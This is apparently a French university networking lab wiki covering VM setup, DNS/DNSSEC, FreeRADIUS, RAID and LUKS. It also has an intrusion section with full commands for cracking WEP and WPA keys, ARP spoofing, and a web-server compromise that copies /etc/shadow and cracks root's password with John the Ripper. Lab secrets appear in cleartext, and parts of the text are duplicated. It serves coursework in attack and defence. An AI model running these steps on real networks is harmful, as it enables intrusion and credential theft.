On obtient les failles suivantes (audit réalisé sur notre VM) :<br />
<br />
[+] [CVE-2021-27365] linux-iscsi<br />
...<br />
[+] [CVE-2021-22555] Netfilter heap out-of-bounds write<br />
...<br />
[+] [CVE-2019-13272] PTRACE_TRACEME<br />
...<br />
<br />
== Cassage de clef WEP d’un point d’accès WiFi ==<br />
<br />
On commence par rechercher le nom de notre interface. On utilise alors la commande (en root) :<br />
<br />
$ airmon-ng<br />
<br />
On trouve l'interface suivante :<br />
<br />
wlx40a5ef0127d0<br />
<br />
On essaie de démarrer l'interface sur le channel 3 :<br />
<br />
$ airmon-ng start wlx40a5ef0127d0 3<br />
<br />
Or on remarque que la réponse de la commande nous indique que l'interface a été renommé automatiquement "wlan0mon". On ré-utilise la commande précédente avec le nouveau nom d'interface :<br />
<br />
$ airmon-ng start wlan0mon 3<br />
<br />
On écoute ensuite tous les paquets dans l'air :<br />
<br />
$ airodump-ng wlan0mon<br />
<br />
A partir de là, on peut choisir un point d'accès à cracker en utilisant son BSSID (obtenu par la commande précédente). On choisit cracotte06.<br />
<br />
$ aireplay-ng -9 -e cracotte06 -a 04:DA:D2:9C:50:55 wlan0mon<br />
<br />
On peut récupérer les VI générés par le point d'accès en les stockant dans les fichiers output. On donne le channel 4 puisque le point d'accès est sur ce channel :<br />
<br />
$ airodump-ng -c 4 --bssid 04:DA:d2:9C:50:55 -w output wlan0mon<br />
<br />
On effectue de fausses authentifications avec la commande aireplay-ng dans un nouveau terminal :<br />
<br />
$ aireplay-ng -1 0 -e cracotte06 -a 04:DA:D2:9C:50:55 -h 40:A5:EF:01:0E:5F wlan0mon<br />
<br />
L'adresse MAC source donnée après le -h est obtenue lorsque l'on récupère les VI.<br />
<br />
Il faut maintenant laisser tourner la commande de récupération des VI assez longtemps pour obtenir assez de données (pour nous içi il a fallu attendre 40000 datas). On peut ensuite décrypter la clef WEP :<br />
<br />
$ aircrack-ng -b 04:DA:D2:9C:50:55 output*.cap<br />
<br />
On obtient alors :<br />
<br />
KEY FOUND ! [ 55:55:55:55:5A:BC:07:CB:A4:44:44:44:44 ]<br />
Decrypted correctly: 100%<br />
<br />
== Cassage de mot de passe WPA-PSK par force brute ==<br />
<br />
$ airmon-ng<br />
$ airmon-ng start wlan0mon 9<br />
$ airodump-ng wlan0mon<br />
<br />
On choisit le point d'accès kracotte06 à cracker. On récupère son BSSID avec la commande précédente et on utilise :<br />
<br />
$ airodump-ng -c 4 --bssid 44:AD:D9:5F:87:05 -w psk wlan0mon<br />
<br />
On crée le dictionnaire contenant toutes les clefs à tester avec la commande <code>crunch</code><br />
<br />
$ crunch 8 8 0123456789 -o dictionnaire.lst<br />
<br />
Pour savoir si un Handshake a été trouvé, on utilise la commande :<br />
<br />
$ aircrack-ng psk*.cap<br />
<br />
On trouve : <br />
<br />
# BSSID ESSID Encryption<br />
1 44:AD:D9:5F:87:05 kracotte06 WPA (1 handshake)<br />
<br />
On peut alors lancer la commande de test des clefs :<br />
<br />
$ aircrack-ng -w dictionnaire.lst -b 44:AD:D9:5F:87:05 psk*.cap<br />
<br />
Après un peu d'attente, on obtient la clef suivante :<br />
<br />
KEY FOUND! [ 59906999 ]<br />
<br />
== Attaque de type "homme au milieu" par usurpation ARP ==<br />
<br />
On branche un PC bleu sur une zabeth en ethernet et on lui configure une IP. Ensuite on peut installer dsniff et wireshark.<br />
<br />
On fait :<br />
<br />
$ echo 1 > /proc/sys/net/ipv4/ip_forward<br />
<br />
Puis on se fait passer pour le routeur (172.26.145.254) auprès de la zabeth (172.26.145.61):<br />
<br />
$ arpspoof -t 172.26.145.61 172.26.145.254<br />
<br />
En lançant wireshark, on peut voir les informations envoyées par la zabeth passer en clair.<br />
<br />
== Intrusion sur un serveur d’application Web ==<br />
<br />
Sur honey.plil.info : <br />
<br />
1. injection SQL<br />
<br />
2. connexion en tant qu'admin<br />
<br />
3. telechargement du fichier "config-db.php" (On remarque que il existe une BDD phpmyadmin) et "database.php" (ce fichier semble lui ne pas nous apporter d'informations)<br />
<br />
4. honey.plil.info/phpmyadmin -> connexion avec les logins trouvés dans le fichier "config-db.php" (phpmyadmin et gencovid19). On trouve alors une table "pma_users" indiquant le nom de plusieurs utilisateurs (totor62, manuals, phpmyadmin et root).<br />
<br />
5. en essayant le mdp "gencovid19" avec ces identifiants sur phpmyadmin : on peut se connecter en tant que "root" sur la BDD et on trouve le mdp de rex dans la bdd "test" et table "users".<br />
<br />
6. connexion en ssh sur rex@honey.plil.info.<br />
<br />
7. comme indication : "le mot de passe de root possède la même particularité que le mot de passe administrateur habituel des machines de projets". Alors on va créer un fichier de mots de 4 lettre pour ensuite doubler ces mots (exemple : bobo => bobobobo) pour essayer de cracker le mot de passe par la force brute. On créée alors le dictionnaire avec l'utilitaire crunch comme pour obtenir les clefs WEP :<br />
<br />
$ crunch 4 4 abcdefghijklmnopqrstuvwxyz > dico.txt<br />
<br />
Et on double la taille des mots :<br />
<br />
$ sed -i 's/\(.*\)/\1\1/' dico.txt<br />
<br />
On copie ensuite les fichiers "/etc/passwd" et "/etc/shadow" de rex@honey.plil.info sur notre zabeth. <br />
<br />
$ scp rex@honey.plil.info:/etc/passwd .<br />
$ scp rex@honey.plil.info:/etc/shadow .<br />
<br />
On utilise alors l'utilitaire "shadow" pour obtenir un fichier contenant le mot de passe haché de root :<br />
<br />
$ unshadow passwd shadow | head -1 > honey<br />
<br />
Puis on utilise "John the Ripper" pour cracker le mot de passe :<br />
<br />
$ john -w:dico.txt honey<br />
<br />
Après quelques minutes, on peut afficher le mot de passe trouvé :<br />
<br />
$ john --show honey<br />
root:fortfort:0:0:root:/root:/bin/bash<br />
1 password hash cracked, 0 left<br />
<br />
On trouve le mot de passe de root@honey.plil.info qui est "fortfort".<br />
<br />
= Point d'accès Wi-Fi authentifié via FreeRADIUS =<br />
<br />
== Configuration du point d'accès ==<br />
<br />
=== Point d'accès ===<br />
<br />
Tout d'abord il faut configurer l'authentification EAP dans la configuration :<br />
<br />
conf t<br />
<br />
aaa new-model<br />
aaa authentication login eap_rose group radius_rose<br />
radius-server host 193.48.57.181 auth-port 1812 acct-port 1813 key zinzin<br />
aaa group server radius radius_rose<br />
server 193.48.57.181 auth-port 1812 acct-port 1813<br />
exit<br />
<br />
Configurons le SSID :<br />
<br />
conf t<br />
<br />
dot11 ssid SSID_ROSE<br />
vlan 5<br />
authentication open eap eap_rose<br />
authentication network-eap eap_rose<br />
authentication key-management wpa<br />
mbssid guest-mode<br />
exit<br />
exit<br />
<br />
On associe notre SSID à l'interface WIFI :<br />
<br />
conf t<br />
<br />
interface Dot11Radio0<br />
encryption vlan 5 mode ciphers aes-ccm tkip<br />
ssid SSID_ROSE<br />
mbssid<br />
exit<br />
exit<br />
<br />
On paramètre notre VLAN (5)<br />
<br />
conf t<br />
<br />
interface Dot11Radio0.5<br />
encapsulation dot1Q 5<br />
no ip route-cache<br />
bridge-group 5<br />
bridge-group 5 subscriber-loop-control<br />
bridge-group 5 spanning-disabled<br />
bridge-group 5 block-unknown-source<br />
exit<br />
exit<br />
<br />
On configure l'interface filaire<br />
<br />
conf t<br />
<br />
interface GigabitEthernet0.5<br />
encapsulation dot1Q 5<br />
bridge-group 5<br />
exit<br />
exit<br />
<br />
Enfin, on configure l'IP de l'AP et sa gateway<br />
<br />
conf t<br />
<br />
ip default-gateway 10.1.0.1<br />
interface BVI 1<br />
ip address 10.1.0.3 255.255.255.0<br />
exit<br />
exit<br />
<br />
=== Routeur ===<br />
<br />
Commençons par configurer le VLAN 1 <br />
<br />
conf t<br />
<br />
interface vlan 1<br />
ip address 10.1.0.1 255.255.255.0<br />
exit<br />
exit<br />
<br />
Puis on configure le port (ici Gi1/0/3<br />
<br />
conf t<br />
<br />
interface Gi1/0/3<br />
switchport<br />
switchport mode trunk<br />
switchport trunk allowed vlan add 1<br />
exit<br />
exit<br />
<br />
Et voilà mon grand<br />
<br />
== Serveur FreeRADIUS ==<br />
<br />
Installation de freeRADIUS<br />
<br />
apt install freeradius<br />
<br />
On commence par configurer <code>/etc/freeradius/3.0/clients.conf</code> à détailler<br />
<br />
client zozo {<br />
ipaddr = 10.1.0.3/24<br />
secret = zinzin<br />
}<br />
<br />
ensuite <code>/etc/freeradius/3.0/eap.conf</code><br />
<br />
eap {<br />
[...]<br />
default_eap_type = peap<br />
}<br />
<br />
puis <code>/etc/freeradius/3.0/users</code><br />
<br />
[...]<br />
root Cleartext-Password := "glopglop"<br />
<br />
Pour vérifier que tout fonctionne bien, on peut lancer freeradius en mode debug <code>freeradius -X</code> (après avoir au préalable stoppé le processus)<br />
<br />
= Réalisations =<br />
<br />
== Sécurisation des données (RAID 5) ==<br />
<br />
Nous avons besoin de 3 LV à rajouter à notre VM :<br />
<br />
$ lvcreate -L1G -n Bellerose-raid1 storage<br />
$ lvcreate -L1G -n Bellerose-raid2 storage<br />
$ lvcreate -L1G -n Bellerose-raid3 storage<br />
<br />
Nous pouvons ainsi les rajouter à la configuration de notre VM (<code>/etc/xen/Bellerose.cfg</code>):<br />
<br />
'phy:/dev/storage/Bellerose-raid1,xvda5,w'<br />
'phy:/dev/storage/Bellerose-raid2,xvda6,w'<br />
'phy:/dev/storage/Bellerose-raid3,xvda7,w'<br />
<br />
Nous pouvons ensuite créer le RAID en relançant la VM et en se connectant dessus.<br />
<br />
$ apt install mdadm<br />
<br />
On va ensuite créer un disque nommé <code>/dev/md0</code> grâce à <code>mdadm</code> :<br />
<br />
$ mdadm --create /dev/md0 --level=5 --raid-devices=3 /dev/xvda5 /dev/xvda6 /dev/xvda7<br />
<br />
On peut ainsi vérifier que notre RAID 5 est effectif :<br />
<br />
$ lsblk<br />
NAME MAJ:MIN RM SIZE RO TYPE MOUNTPOINT<br />
xvda1 202:1 0 512M 0 disk [SWAP]<br />
xvda2 202:2 0 4G 0 disk /<br />
xvda3 202:3 0 10G 0 disk /home<br />
xvda4 202:4 0 10G 0 disk /var<br />
xvda5 202:5 0 1G 0 disk <br />
`-md0 9:0 0 2G 0 raid5 <br />
xvda6 202:6 0 1G 0 disk <br />
`-md0 9:0 0 2G 0 raid5 <br />
xvda7 202:7 0 1G 0 disk <br />
`-md0 9:0 0 2G 0 raid5 <br />
<br />
Enfin il faut monter ce disque fraîchement créé :<br />
<br />
$ mkfs.ext4 /dev/md0<br />
$ mkdir /media/raid<br />
<br />
on ajoute cette ligne dans <code>/etc/fstab</code> :<br />
<br />
/dev/md0 /media/raid ext4 defaults 0 1<br />
<br />
puis<br />
<br />
$ mount -a<br />
<br />
et toc<br />
<br />
== Chiffrement des données ==<br />
<br />
On branche la clé USB sur le petit PC bleu, et on lance <code>lsblk</code> et on trouve :<br />
<br />
NAME MAJ:MIN RM SIZE RO TYPE MOUNTPOINT<br />
sda 8:0 1 7,2G 0 disk <br />
<br />
Donc on peut formater la clef qui contient déjà quelque chose dessus :<br />
<br />
$ mkfs.ext4 /dev/sda<br />
<br />
Avec <code>cryptsetup</code> on peut initialiser la clef et lui donner un mdp :<br />
<br />
$ cryptsetup luksFormat /dev/sda<br />
<br />
On crée une partition chiffrée sur la clé :<br />
<br />
$ cryptsetup luksOpen /dev/sda data<br />
<br />
Et on formate :<br />
<br />
$ mkfs.ext4 /dev/mapper/data<br />
<br />
On monte cette partition pour lui permettre de contenir des fichiers :<br />
<br />
$ mkdir /mnt/data-usb<br />
$ mount -t ext4 /dev/mapper/data /mnt/data-usb<br />
<br />
On y ajoute donc un fichier de test :<br />
<br />
$ touch /mnt/data-usb/boujour.txt<br />
<br />
Puis on démonte et on ferme le volume chiffré<br />
<br />
$ umont /mnt/data-usb<br />
$ cryptsetup luksClose data<br />
<br />
Ensuite en branchant la clé USB sur un autre PC pour voir le fonctionnement de notre chiffrement, et lorsqu'on essaie d'accèder à la clef, celle ci nous demande un mot de passe pour accèder aux fichiers, donc le chiffrement fonctionne correctement.</div>Bjacquothttps://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5_2021/2022_G6&diff=57832TP sysres IMA5 2021/2022 G62022-01-11T14:34:27Z<p>Bjacquot : /* DNSSEC */</p>
<hr />
<div>__TOC__<br />
<br style="clear: both;"/><br />
<br />
=Création de la machine virtuelle=<br />
<br />
On veut créer notre machine virtuelle sur l'hyperviseur (HV) capbreton. Afin de pouvoir télécharger l'image Debian, on utilise tout d'abord la commande suivante :<br />
<br />
$ export http_proxy=http://proxy.plil.fr:3128<br />
<br />
Pour lancer la création de la machine virtuelle, on doit donner le nom de la machine qui sera Bellerose (d'après le thème des noms de bière). Ensuite nous avons l'adresse IP qui nous a été attribuée lors de la répartition des groupes (donc pour nous ce sera 193.48.57.181). On donne aussi l'adresse IP du routeur flottant (193.48.57.190) et le masque du réseau (255.255.255.240 car c'est un /28). On indique également l'emplacement des disques virtuels : /usr/local/xen, le mot de passe pour se connecter à la machine virtuelle : pasglop, et la distribution que nous allons utiliser qui est Debian bullseye.<br />
<br />
$ xen-create-image --hostname=Bellerose --ip=193.48.57.181 --gateway=193.48.57.190 --netmask=255.255.255.240 --dir=/usr/local/xen --password=pasglop --dist=bullseye<br />
<br />
On crée ensuite 2 LV de 10 Go (nommés Bellerose1 et Bellerose2) sur le groupe de volume storage.<br />
<br />
$ lvcreate -L10G -n Bellerose1 storage<br />
$ lvcreate -L10G -n Bellerose2 storage<br />
<br />
Puis il faut les formater au format ext4, alors on utilise les commandes suivantes :<br />
<br />
$ mkfs.ext4 /dev/storage/Bellerose1<br />
$ mkfs.ext4 /dev/storage/Bellerose2<br />
<br />
On modifie notre fichier /etc/xen/Bellerose.cfg pour indiquer à la machine virtuelle qu'elle possède les volumes logiques Bellerose1 et Bellerose2 (on ajoute alors 2 lignes dans la fonction disk) et on ajoute le bridge IMA5sc dans la fonction vif.<br />
<br />
$ vim /etc/xen/Bellerose.cfg<br />
disk = [<br />
'file:/usr/local/xen/domains/Bellerose/disk.img,xvda2,w',<br />
'file:/usr/local/xen/domains/Bellerose/swap.img,xvda1,w',<br />
'phy:/dev/storage/Bellerose1,xvda3,w',<br />
'phy:/dev/storage/Bellerose2,xvda4,w'<br />
]<br />
vif = [ 'ip=193.48.57.181 ,mac=00:16:3E:FA:D0:95 ,bridge=IMA5sc' ]<br />
<br />
On peut maintenant lancer notre machine virtuelle :<br />
<br />
$ xl create -c /etc/xen/Bellerose.cfg<br />
<br />
Avec la commande :<br />
<br />
$ cat /etc/fstab<br />
<br />
On voit xvda1 et xvda2. On va créer xvda3 et xvda4 pour pouvoir y mettre les répertoires var et home de notre machine virtuelle :<br />
<br />
$ mkdir /mnt/xvda3<br />
$ mkdir /mnt/xvda4<br />
$ mount /dev/xvda3 /mnt/xvda3<br />
$ mount /dev/xvda4 /mnt/xvda4<br />
<br />
Puis on déplace le répertoire var dans le disque xvda4 :<br />
<br />
$ mv /var/* /mnt/xvda4<br />
<br />
Pour monter les disques, on ajoute ces lignes dans le fichier /etc/fstab :<br />
<br />
# /home vers xvda3<br />
/dev/xvda3 /home ext4 defaults 0 2<br />
# /var vers xvda4<br />
/dev/xvda4 /var ext4 defaults 0 2<br />
<br />
On monte le tout à l'aide de la commande :<br />
<br />
mount -a<br />
<br />
Enfin avec lsblk, on peut voir les deux partitions de notre VM :<br />
<br />
$ lsblk<br />
xvda3 202:3 0 10G 0 disk /home<br />
xvda4 202:4 0 10G 0 disk /var<br />
<br />
Enfin, nous activons l'IPv6 sur l'interface en modifiant <code>/etc/network/interfaces</code><br />
<br />
iface eth0 inet6 auto<br />
<br />
Pour quitter la VM : CTRL+]<br />
<br />
= Services Internet =<br />
<br />
== Serveur SSh ==<br />
<br />
$ apt install openssh-server<br />
<br />
on édite le fichierde conf <code>/etc/ssh/sshd_config</code> (via ssh key) :<br />
<br />
PermitRootLogin without-password<br />
PubkeyAuthentication yes<br />
<br />
après on reload la conf<br />
<br />
$ systemctl reload ssh<br />
<br />
On génère une clé ssh avec <code>ssh-keygen -t ed25519</code> et on l'ajoute dans <code>/.ssh/authorized_keys</code> et c'est gooooood<br />
<br />
== Serveur DNS ==<br />
<br />
on achète le ndd<br />
<br />
on crée un "Glue Record" pour notre nameserver <code>ns1.belle-rose.site</code><br />
<br />
on install bind<br />
<br />
$ apt install bind9<br />
<br />
on configure <code>/etc/resolv.conf</code><br />
<br />
nameserver 127.0.0.1<br />
<br />
on configure bind <code>/etc/bind/named.conf.local</code><br />
<br />
zone "belle-rose.site" IN {<br />
type master;<br />
file "/etc/bind/db.belle-rose.site";<br />
allow-transfer { 217.70.177.40; };<br />
};<br />
<br />
On ajoute nos ns <code>/etc/bind/db.belle-rose.site</code><br />
<br />
;<br />
; BIND dans ta face<br />
;<br />
$TTL 604800<br />
@ IN SOA ns1.belle-rose.site. postmaster.belle-rose.site. (<br />
2 ; Serial<br />
604800 ; Refresh<br />
86400 ; Retry<br />
2419200 ; Expire<br />
604800 ) ; Negative Cache TTL<br />
;<br />
@ IN NS ns1.belle-rose.site.<br />
@ IN NS ns6.gandi.net.<br />
ns1 IN A 193.48.57.181<br />
<br />
Ensuite on peut tester notre conf avec<br />
<br />
$ host -t any ns1.belle-rose.site localhost<br />
Using domain server:<br />
Name: localhost<br />
Address: 127.0.0.1#53<br />
Aliases: <br />
<br />
ns1.belle-rose.site has address 193.48.57.181<br />
<br />
Et on incrémente aussi le Serial dans <code>/etc/bind/db.belle-rose.site</code> à 3.<br />
<br />
== Certificat ==<br />
<br />
Notre certificat Gandi nous a été retiré de force par quelqu'un de mal intentionné. De ce fait, nous avons utilisé un certificat <code>Let's Encrypt</code>. Après avoir installé <code>certbot</code>, on utilise simplement la commande :<br />
<br />
certbot --apache<br />
<br />
https://www.belle-rose.site/ IZOK<br />
<br />
== DNSSEC ==<br />
<br />
On suit les étapes suivantes :<br />
<br />
1. On ajoute l’option <code>dnssec-enable yes;</code> dans le fichier <code>named.conf.options</code><br />
<br />
2. On crée un répertoire <code>belle-rose.site.dnssec</code> pour y générer les clefs<br />
<br />
3. On crée la clef asymétrique de signature de clefs de zone :<br />
<br />
$ dnssec-keygen -a RSASHA1 -b 2048 -f KSK -n ZONE belle-rose.site<br />
<br />
4. On crée la clef asymétrique de la zone pour signer les enregistrements<br />
<br />
$ dnssec-keygen -a RSASHA1 -b 1024 -n ZONE belle-rose.site <br />
<br />
5. On renomme les deux paires de clefs obtenues en utilisant le nom de la zone comme préfixe puis en suffixant d’abord par la destination de la clef (-ksk pour la KSK ou -zsk pour la ZSK) puis par le type de clef (.key pour la clef publique ou .private pour la clef privée);<br />
<br />
$ mv Kbelle-rose.site.+005+37138.key belle-rose.site-ksk.key<br />
$ mv Kbelle-rose.site.+005+35638.key belle-rose.site-zsk.key<br />
$ mv Kbelle-rose.site.+005+37138.private belle-rose.site-ksk.private<br />
$ mv Kbelle-rose.site.+005+35638.private belle-rose.site-zsk.private<br />
<br />
6. On inclue les clefs publiques dans votre fichier de zone <code>/etc/bind/db.belle-rose.site</code>, et on incrémente le numéro de version de la zone ;<br />
<br />
$include /etc/bind/belle-rose.site.dnssec/belle-rose.site-ksk.key<br />
$include /etc/bind/belle-rose.site.dnssec/belle-rose.site-zsk.key<br />
<br />
7. On signe les enregistrements de la zone ;<br />
<br />
$ dnssec-signzone -o belle-rose.site -k belle-rose.site-ksk ../db.belle-rose.site belle-rose.site-zsk<br />
<br />
8. On modifie le fichier <code>named.conf.local</code> pour utiliser la zone signée de suffixe .signed :<br />
<br />
$ vim ../named.conf.local<br />
zone "belle-rose.site" IN {<br />
type master;<br />
file "/etc/bind/db.belle-rose.site.signed";<br />
allow-transfer { 217.70.177.40; };<br />
};<br />
<br />
9. il ne reste plus qu’à communiquer la partie publique de la KSK (présente dans le fichier www.belle-rose.site-ksk.key) à notre registrar (sur gandi.net, dans la section "Manage DNSSEC" puis "DNS servers")<br />
<br />
root@Bellerose:/etc/bind/belle-rose.site.dnssec# cat belle-rose.site-ksk.key <br />
; This is a key-signing key, keyid 22094, for belle-rose.site.<br />
; Created: 20220111091701 (Tue Jan 11 09:17:01 2022)<br />
; Publish: 20220111091701 (Tue Jan 11 09:17:01 2022)<br />
; Activate: 20220111091701 (Tue Jan 11 09:17:01 2022)<br />
belle-rose.site. IN DNSKEY 257 3 5 AwEAAbbNBQJskwFezV1LwDsxAkCVbOcy4X3/mgffMjd/3FIHZpkdVrk3 w88041cgWbVSmom0ma8fFNqntidWlO//rMPvKT0ex3dqCse7on3/odox vxR3Zh5hPdv4K7X35BLuZta4x/RCBLgiFVyXo12qqBl0Htxn2hRyycKv 2caEYwnyRI75KSrr5f5XtQS8LyZCbtmMAp5YJu1wiDxwLcUwwJKvYS+q dtq4sm3KwW+qbjcUswkMMjXNAsvzwZ5FyHcondvvPuErc+Fhdvpxyoq+ W44ynLRnz7cb3R44z/TXFCwNlQI3MWzFvhbDK1YeJLpqjgYrET4eqqka mbFMYuLPQzE=<br />
<br />
(on copie que la partie chiffrée, pas le record DNSKEY)<br />
<br />
10. Enfin, nous pouvons tester la configuration:<br />
<br />
root@Bellerose:~# host -t any belle-rose.site<br />
belle-rose.site has RRSIG record DS 8 2 3600 20220210205226 20220111074233 56238 site. t5ANbAiG69DP5E9ccCIMtEEMs1urP6mSQpb210bDUbCD7vdXqONhLJ9M dcjyHQjhdTWKd9qc48tnY8fwL4PUeOYLexcaUEQgLMkbEBUDMzpcvMsb n4sM2BXgk7lJ9vyE1zsgfBNg7X8IV5c7sRrEuZyg7VbjPYmqx5BJ3cC8 Dy0=<br />
belle-rose.site has DS record 22094 5 2 86D5EAC51853FAA1865BB63C0F353EEB50D5A59093409E66A3F7044C AC3AF70F<br />
belle-rose.site name server ns6.gandi.net.<br />
belle-rose.site name server ns1.belle-rose.site.<br />
belle-rose.site has RRSIG record DNSKEY 5 2 604800 20220210082130 20220111082130 6672 belle-rose.site. bh2pFBuNXANoGib6RK5MAab6xy7jbUEYVOr6Pk/pa8weJPD/ACk0Z1pm urvc++ReoccxNxNy+BCd2Ri1GLhZ+kGXrF8xuNUYdyo+zpd+zZUgrx1C hKRSUqeBVpAn0uyDlRtG8cPPw01iYpDBCqmnif7+GblIH6eSJhOf+98d l8o=<br />
belle-rose.site has RRSIG record DNSKEY 5 2 604800 20220210082130 20220111082130 22094 belle-rose.site. JLB0MJqr8rfBq2MiVrZaRyDo/7/7V1GUGwCi108w8CgeUrIdImgXERY4 2nXQ21aym3Po0i+zs5DmEonEkTGMi63kjUG8ZeFjMCFm7KtNhRK8FkQk Be2yzv3odAhh/gmMyRsMa7yoLwaDWZVd4NkCJ6EaqNXP7yspcHD6pmHt 4RKJgCUo6zpLAJnFiU1cwIR+lS/HeFEW2OzOtvi/LH8bL1zewioEpTgi qHLplK68KR/1cX/4Dq2C3CaeChteMx//EkW9Vmwjg9BhRjE/VCa8P80w qJEiXeg8KXYLkCEiBK5ifgKy5EMxDG5q18ieRXaUc0F6FpG0A4POpTVx pscHmA==<br />
belle-rose.site has DNSKEY record 257 3 5 AwEAAbbNBQJskwFezV1LwDsxAkCVbOcy4X3/mgffMjd/3FIHZpkdVrk3 w88041cgWbVSmom0ma8fFNqntidWlO//rMPvKT0ex3dqCse7on3/odox vxR3Zh5hPdv4K7X35BLuZta4x/RCBLgiFVyXo12qqBl0Htxn2hRyycKv 2caEYwnyRI75KSrr5f5XtQS8LyZCbtmMAp5YJu1wiDxwLcUwwJKvYS+q dtq4sm3KwW+qbjcUswkMMjXNAsvzwZ5FyHcondvvPuErc+Fhdvpxyoq+ W44ynLRnz7cb3R44z/TXFCwNlQI3MWzFvhbDK1YeJLpqjgYrET4eqqka mbFMYuLPQzE=<br />
belle-rose.site has DNSKEY record 256 3 5 AwEAAdZrHCSjl8nMZ0pwfODUtCs4nD6iStiZzuBAfWTsm75qpG6JJzpr e3Oqqyr/Dm1bwXbLQUd0GNgGAidiAQtkbZIb/5ZQxuVxft2kp0GKUr34 44Bw1Gh8af1Npk9cqK368U6oD+EIrV2AnA2KC/KXm+DziNOkmifaFVvO rh6p91Ut<br />
belle-rose.site has RRSIG record NSEC 5 2 604800 20220210082130 20220111082130 6672 belle-rose.site. RXnysXybktajyP82ERJn1m9z/5dkOQABIzfUPf2/08jFQq96AMmEggH2 sAy/3wv6SKiwAvBN3dFkYtIefMAK0MdLykIwwLrGQwK1BSv5KKLCowtO Bdks2pjgBPFE4J/MnBnBXSm0HunudjziNgz+PN3bY/IieyPzIBfpHM0y UfM=<br />
belle-rose.site has NSEC record ns1.belle-rose.site. NS SOA RRSIG NSEC DNSKEY<br />
belle-rose.site has RRSIG record NS 5 2 604800 20220210082130 20220111082130 6672 belle-rose.site. GZRzkPkOu/RKjCE2+NWhHfTcicDCoaBq/QjimrrVPsMcse0pPebFZkTr lRHMLHZEglzopIigLwj3DQ7yjuB6EiAhudUWwZri82LjkVs+z5ItMPo6 kudNvs5oUqVGX7E6toy5rU11yBgPDNijuCI1aahUJpwAEOl9sGi9uJ9I NaI=<br />
belle-rose.site has RRSIG record SOA 5 2 604800 20220210082130 20220111082130 6672 belle-rose.site. rDQsyAPj2RG4epQ7AFGrpU4JzyAi1kif3X4N8L+53IrlNWMcByyCVtAA 1XRQ8+Ag7f8/Z7nMhLbRuPtEH6efhZJfhEOuuU0SK7Nernm6WgkCS4UI e4VVtXtbHLeM+CncfUywqpKRhyZB9qEpzloNdI6zyOlzS9bH9qMwZFSS TWY=<br />
belle-rose.site has SOA record ns1.belle-rose.site. postmaster.belle-rose.site. 6 604800 86400 2419200 604800<br />
<br />
= Tests d'intrusion =<br />
<br />
== Exploitation de failles du système ==<br />
<br />
Après plusieurs recherches, nous avons trouvé un petit soft permettant d'audit notre système et y afficher les possibles failles. > https://github.com/mzet-/linux-exploit-suggester<br />
<br />
En suivant la documentation :<br />
<br />
$ wget https://raw.githubusercontent.com/mzet-/linux-exploit-suggester/master/linux-exploit-suggester.sh -O les.sh<br />
$ chmod +x les.sh && ./les.sh<br />
<br />
On obtient les failles suivantes (audit réalisé sur notre VM) :<br />
<br />
[+] [CVE-2021-27365] linux-iscsi<br />
...<br />
[+] [CVE-2021-22555] Netfilter heap out-of-bounds write<br />
...<br />
[+] [CVE-2019-13272] PTRACE_TRACEME<br />
...<br />
<br />
== Cassage de clef WEP d’un point d’accès WiFi ==<br />
<br />
On commence par rechercher le nom de notre interface. On utilise alors la commande (en root) :<br />
<br />
$ airmon-ng<br />
<br />
On trouve l'interface suivante :<br />
<br />
wlx40a5ef0127d0<br />
<br />
On essaie de démarrer l'interface sur le channel 3 :<br />
<br />
$ airmon-ng start wlx40a5ef0127d0 3<br />
<br />
Or on remarque que la réponse de la commande nous indique que l'interface a été renommé automatiquement "wlan0mon". On ré-utilise la commande précédente avec le nouveau nom d'interface :<br />
<br />
$ airmon-ng start wlan0mon 3<br />
<br />
On écoute ensuite tous les paquets dans l'air :<br />
<br />
$ airodump-ng wlan0mon<br />
<br />
A partir de là, on peut choisir un point d'accès à cracker en utilisant son BSSID (obtenu par la commande précédente). On choisit cracotte06.<br />
<br />
$ aireplay-ng -9 -e cracotte06 -a 04:DA:D2:9C:50:55 wlan0mon<br />
<br />
On peut récupérer les VI générés par le point d'accès en les stockant dans les fichiers output. On donne le channel 4 puisque le point d'accès est sur ce channel :<br />
<br />
$ airodump-ng -c 4 --bssid 04:DA:d2:9C:50:55 -w output wlan0mon<br />
<br />
On effectue de fausses authentifications avec la commande aireplay-ng dans un nouveau terminal :<br />
<br />
$ aireplay-ng -1 0 -e cracotte06 -a 04:DA:D2:9C:50:55 -h 40:A5:EF:01:0E:5F wlan0mon<br />
<br />
L'adresse MAC source donnée après le -h est obtenue lorsque l'on récupère les VI.<br />
<br />
Il faut maintenant laisser tourner la commande de récupération des VI assez longtemps pour obtenir assez de données (pour nous içi il a fallu attendre 40000 datas). On peut ensuite décrypter la clef WEP :<br />
<br />
$ aircrack-ng -b 04:DA:D2:9C:50:55 output*.cap<br />
<br />
On obtient alors :<br />
<br />
KEY FOUND ! [ 55:55:55:55:5A:BC:07:CB:A4:44:44:44:44 ]<br />
Decrypted correctly: 100%<br />
<br />
== Cassage de mot de passe WPA-PSK par force brute ==<br />
<br />
$ airmon-ng<br />
$ airmon-ng start wlan0mon 9<br />
$ airodump-ng wlan0mon<br />
<br />
On choisit le point d'accès kracotte06 à cracker. On récupère son BSSID avec la commande précédente et on utilise :<br />
<br />
$ airodump-ng -c 4 --bssid 44:AD:D9:5F:87:05 -w psk wlan0mon<br />
<br />
On crée le dictionnaire contenant toutes les clefs à tester avec la commande <code>crunch</code><br />
<br />
$ crunch 8 8 0123456789 -o dictionnaire.lst<br />
<br />
Pour savoir si un Handshake a été trouvé, on utilise la commande :<br />
<br />
$ aircrack-ng psk*.cap<br />
<br />
On trouve : <br />
<br />
# BSSID ESSID Encryption<br />
1 44:AD:D9:5F:87:05 kracotte06 WPA (1 handshake)<br />
<br />
On peut alors lancer la commande de test des clefs :<br />
<br />
$ aircrack-ng -w dictionnaire.lst -b 44:AD:D9:5F:87:05 psk*.cap<br />
<br />
Après un peu d'attente, on obtient la clef suivante :<br />
<br />
KEY FOUND! [ 59906999 ]<br />
<br />
== Attaque de type "homme au milieu" par usurpation ARP ==<br />
<br />
On branche un PC bleu sur une zabeth en ethernet et on lui configure une IP. Ensuite on peut installer dsniff et wireshark.<br />
<br />
On fait :<br />
<br />
$ echo 1 > /proc/sys/net/ipv4/ip_forward<br />
<br />
Puis on se fait passer pour le routeur (172.26.145.254) auprès de la zabeth (172.26.145.61):<br />
<br />
$ arpspoof -t 172.26.145.61 172.26.145.254<br />
<br />
En lançant wireshark, on peut voir les informations envoyées par la zabeth passer en clair.<br />
<br />
== Intrusion sur un serveur d’application Web ==<br />
<br />
Sur honey.plil.info : <br />
<br />
1. injection SQL<br />
<br />
